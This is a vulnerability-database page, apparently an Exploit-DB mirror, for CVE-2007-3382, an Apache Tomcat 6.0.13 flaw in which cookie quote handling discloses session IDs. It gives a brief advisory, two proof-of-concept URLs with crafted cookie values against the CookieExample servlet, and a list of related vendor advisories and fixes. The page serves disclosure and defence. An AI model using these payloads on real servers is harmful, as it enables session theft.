Lucene search
Tomasz KuczynskiEDB-ID:30496HistoryAug 14, 2007 - 12:00 a.m.
Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disclosure
2007-08-1400:00:00
Tomasz Kuczynski
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/25316/info
Apache Tomcat is prone to multiple information-disclosure vulnerabilities because it fails to adequately sanitize user-supplied data.
Attackers can exploit these issues to access potentially sensitive data that may aid in further attacks.
Versions prior to Apache Tomcat 6.0.14 are vulnerable.
http://www.example.com:8080/examples/servlets/servlet/CookieExample?cookiename=HAHA&cookievalue=%5C%22FOO%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2F%3B
http://www.example.com:8080/servlets-examples/servlet/CookieExample?cookiename=BLOCKER&cookievalue=%5C%22A%3D%27%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2Fservlets-examples%2Fservlet+%3B Related
cert
cert
Apache Tomcat fails to properly handle cookies containing single quotes
2007-08-14 00:00:00
cve
cve
CVE-2007-3382
2007-08-14 22:17:00
osv
osv
Apache Tomcat treats single quotes as delimiters in cookies
2022-05-01 18:13:14
tomcat5 - several vulnerabilities
2008-01-07 00:00:00
tomcat5.5 several vulnerabilities
2008-01-03 00:00:00
prion
prion
Session fixation
2007-08-14 22:17:00
securityvulns
securityvulns
CVE-2007-3382: Handling of cookies containing a ' character
2007-08-14 00:00:00
nvd
nvd
CVE-2007-3382
2007-08-14 22:17:00
cvelist
cvelist
CVE-2007-3382
2007-08-14 22:00:00
ubuntucve
ubuntucve
CVE-2007-3382
2007-08-14 00:00:00
github
github
Apache Tomcat treats single quotes as delimiters in cookies
2022-05-01 18:13:14
redhat
redhat
(RHSA-2007:0871) Moderate: tomcat security update
2007-09-26 00:00:00
(RHSA-2008:0195) Moderate: tomcat security update
2008-04-28 00:00:00
veracode
veracode
Session Hijacking
2018-11-13 05:10:16
seebug
seebug
Apache Tomcatε€δΈͺθΏη¨δΏ‘ζ―ζ³ι²ζΌζ΄
2007-08-23 00:00:00
openvas
openvas
Debian Security Advisory DSA 1453-1 (tomcat5)
2008-01-17 00:00:00
Debian: Security Advisory (DSA-1453-1)
2008-01-17 00:00:00
Oracle: Security Advisory (ELSA-2007-0871)
2015-10-08 00:00:00
centos
centos
tomcat5 security update
2007-09-28 08:11:50
nessus
nessus
Oracle Linux 5 : tomcat (ELSA-2007-0871)
2013-07-12 00:00:00
Debian DSA-1453-1 : tomcat5 - several vulnerabilities
2008-01-08 00:00:00
CentOS 5 : tomcat (CESA-2007:0871)
2010-01-06 00:00:00
oraclelinux
oraclelinux
Moderate: tomcat security update
2007-09-26 00:00:00
debian
debian
[SECURITY] [DSA 1453-1] New tomcat5 packages fix several vulnerabilities
2008-01-07 18:41:20
[SECURITY] [DSA 1447-1] New tomcat5.5 packages fix several vulnerabilities
2008-01-03 21:54:49
atlassian
atlassian
Upgrade standalone Tomcat to 5.5.25
2008-01-15 04:23:59
Upgrade standalone Tomcat to 5.5.25
2008-01-15 04:23:59
tomcat
tomcat
Fixed in Apache Tomcat 6.0.14
2007-08-13 00:00:00
Fixed in Apache Tomcat 5.5.25, 5.0.SVN
2007-09-08 00:00:00
Fixed in Apache Tomcat 4.1.37
2005-10-06 00:00:00
fedora
fedora
[SECURITY] Fedora 8 Update: tomcat5-5.5.25-1jpp.1.fc8
2007-11-17 05:37:36
[SECURITY] Fedora 7 Update: tomcat5-5.5.25-1jpp.1.fc7
2007-11-17 05:34:43
[SECURITY] Fedora 7 Update: tomcat5-5.5.26-1jpp.2.fc7
2008-02-13 04:55:03
altlinux
altlinux